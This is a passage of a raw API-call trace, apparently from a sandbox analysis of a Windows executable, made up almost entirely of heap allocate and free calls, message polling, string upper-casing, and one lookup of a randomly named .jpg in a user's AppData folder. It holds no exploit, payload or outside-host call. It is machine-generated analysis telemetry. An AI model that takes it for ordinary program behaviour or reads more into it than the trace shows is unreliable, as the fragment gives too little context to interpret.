hHeap=0x2af0000) returned 1 [0122.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0122.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0122.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0122.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0122.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0122.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0122.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72368 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0122.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0122.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0122.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0122.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0122.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0122.976] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0122.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0122.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0122.976] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0122.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0122.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0122.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0122.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0122.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0122.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0122.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0122.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0122.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0122.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0122.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0122.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0122.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0122.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0122.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0122.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0122.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0122.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0122.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0122.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0122.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0122.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0122.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0122.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0122.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0122.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0122.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0122.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0122.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0122.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0122.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0122.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0122.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0122.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0122.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0122.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0122.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0122.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0122.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0122.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0122.992] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/m3JGHdzSozsPviDT.jpg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc403710, ftCreationTime.dwHighDateTime=0x1d5d443, ftLastAccessTime.dwLowDateTime=0x6b4df440, ftLastAccessTime.dwHighDateTime=0x1d5ca6b, ftLastWriteTime.dwLowDateTime=0x6b4df440, ftLastWriteTime.dwHighDateTime=0x1d5ca6b, nFileSizeHigh=0x0, nFileSizeLow=0xf524, dwReserved0=0x0, dwReserved1=0x0, cFileName="m3JGHdzSozsPviDT.jpg", cAlternateFileName="M3JGHD~1.JPG")) returned 0x9a4440 [0122.992] FindClose (in: hFindFile=0x9a4440 | out: hFindFile=0x9a4440) returned 1 [0122.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0122.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0122.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0122.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0122.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0122.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0122.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0122.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0122.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0122.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0122.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0122.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0122.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0122.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0122.996] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.996] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0122.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 